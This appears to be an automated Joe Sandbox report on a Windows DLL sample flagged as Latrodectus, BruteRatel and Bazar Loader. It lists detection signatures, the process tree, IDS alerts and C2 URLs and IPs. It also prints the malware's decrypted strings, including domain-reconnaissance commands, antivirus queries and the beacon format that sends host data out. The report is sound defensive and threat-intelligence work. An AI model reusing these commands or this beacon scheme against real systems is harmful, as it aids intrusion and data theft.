Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
vierm_soft_x64.dll.dll

Overview

General Information

Sample name:vierm_soft_x64.dll.dll
(renamed file extension from exe to dll)
Original sample name:vierm_soft_x64.dll.exe
Analysis ID:1525190
MD5:b1ca25f5bb4edd293b3711c77eb99a6f
SHA1:178bba8686ea329b884a652fe0f8a0ae0c53d367
SHA256:97a6331239d451d7dfe15bfe17de8b419df741ae68bacd440808f8b8d3f99b8a
Tags:BruteRatelBruteRatelexeuser-k3dg3___
Infos:

Detection

Bazar Loader, BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Bazar Loader
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 1048 cmdline: loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6492 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7148 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 7176 cmdline: C:\Windows\system32\WerFault.exe -u -p 7148 -s 328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 3648 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7196 cmdline: C:\Windows\system32\WerFault.exe -u -p 3648 -s 316 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7376 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7412 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7468 cmdline: rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7504 cmdline: C:\Windows\system32\WerFault.exe -u -p 7468 -s 320 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7596 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7736 cmdline: C:\Windows\system32\WerFault.exe -u -p 7596 -s 324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7604 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7620 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7744 cmdline: C:\Windows\system32\WerFault.exe -u -p 7620 -s 320 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7632 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7656 cmdline: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000003.1574746232.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_2Yara detected BruteRatelJoe Security
      00000017.00000002.2578334597.0000029F3B6B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
        00000017.00000002.2578591825.0000029F3B750000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
          00000017.00000003.1574660950.0000029F3B8A5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            23.2.rundll32.exe.29f3b750000.5.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
              23.2.rundll32.exe.29f3b6b0000.3.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security
                23.2.rundll32.exe.29f3b750000.5.raw.unpackJoeSecurity_Bazar_2Yara detected Bazar LoaderJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: RunDLL32 Spawning Explorer
                  Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7656, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 3504, ProcessName: explorer.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T20:46:42.630626+020020487351A Network Trojan was detected192.168.2.949773188.114.96.3443TCP
                  2024-10-03T20:46:45.351889+020020487351A Network Trojan was detected192.168.2.949774188.114.96.3443TCP
                  2024-10-03T20:46:46.527538+020020487351A Network Trojan was detected192.168.2.949777188.114.96.3443TCP
                  2024-10-03T20:46:47.547558+020020487351A Network Trojan was detected192.168.2.949779188.114.96.3443TCP
                  2024-10-03T20:46:48.752248+020020487351A Network Trojan was detected192.168.2.949780188.114.96.3443TCP
                  2024-10-03T20:46:49.848084+020020487351A Network Trojan was detected192.168.2.949781188.114.96.3443TCP
                  2024-10-03T20:46:51.851738+020020487351A Network Trojan was detected192.168.2.949782188.114.96.3443TCP
                  2024-10-03T20:46:53.264586+020020487351A Network Trojan was detected192.168.2.949784188.114.96.3443TCP
                  2024-10-03T20:46:54.396842+020020487351A Network Trojan was detected192.168.2.949787188.114.96.3443TCP
                  2024-10-03T20:46:55.412234+020020487351A Network Trojan was detected192.168.2.949788188.114.96.3443TCP
                  2024-10-03T20:46:56.534892+020020487351A Network Trojan was detected192.168.2.949789188.114.96.3443TCP
                  2024-10-03T20:46:57.584944+020020487351A Network Trojan was detected192.168.2.949790188.114.96.3443TCP
                  2024-10-03T20:46:59.710024+020020487351A Network Trojan was detected192.168.2.949793188.114.96.3443TCP
                  2024-10-03T20:47:00.749841+020020487351A Network Trojan was detected192.168.2.949795188.114.96.3443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://isomicrotich.com/test/", "https://opewolumeras.com/test/"], "Group Name": "Alpha", "Campaign ID": 55079499}
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Sample uses string decryption to hide its real strings
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c ipconfig /all
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c systeminfo
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c nltest /domain_trusts
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c net view /all
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c net view /all /domain
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &ipconfig=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c net config workstation
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /c whoami /groups
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &systeminfo=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &domain_trusts=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &domain_trusts_all=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &net_view_all_domain=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &net_view_all=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &net_group=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &wmic=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &net_config_ws=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &net_wmic_av=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &whoami_group=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "pid":
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "%d",
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "proc":
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "%s",
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "subproc": [
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &proclist=[
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "pid":
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "%d",
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "proc":
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "%s",
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "subproc": [
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &desklinks=[
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: *.*
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "%s"
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Update_%x
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Custom_update
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: .dll
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: .exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Error
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: runnung
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %s/%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: front
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: /files/
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Alpha
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Cookie:
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: POST
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: GET
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: curl/7.88.1
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: CLEARURL
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: URLS
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: COMMAND
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: ERROR
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: VHzTOEx62sr5cYaQrGJbsm05R2gZwO1VTkHTNfF8DAm5aNNw1n
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: [{"data":"
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: "}]
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &dpost=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: https://isomicrotich.com/test/
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: https://opewolumeras.com/test/
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: \*.dll
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: AppData
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Desktop
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Startup
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Personal
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Local AppData
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %s%d.dll
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: <!DOCTYPE
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Content-Length: 0
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: <html>
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Content-Type: application/dns-message
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: 12345
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: 12345
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &stiller=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %s%d.exe
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %x%x
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &mac=
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %02x
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: :%02x
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &computername=%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: &domain=%s
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: LogonTrigger
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: \Registry\Machine\
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: TimeTrigger
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: PT0H%02dM
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: PT0S
                  Source: 30.2.explorer.exe.89d0000.0.raw.unpackString decryptor: \update_data.dat
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49773 version: TLS 1.2
                  Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
                  Source: Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,30_2_089DA8E0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,30_2_089D2B28

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49779 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49789 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49774 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49782 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49781 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49773 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49793 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49784 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49787 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49777 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49790 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49788 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49780 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.9:49795 -> 188.114.96.3:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 443
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://isomicrotich.com/test/
                  Source: Malware configuration extractorURLs: https://opewolumeras.com/test/
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8041 -> 49791
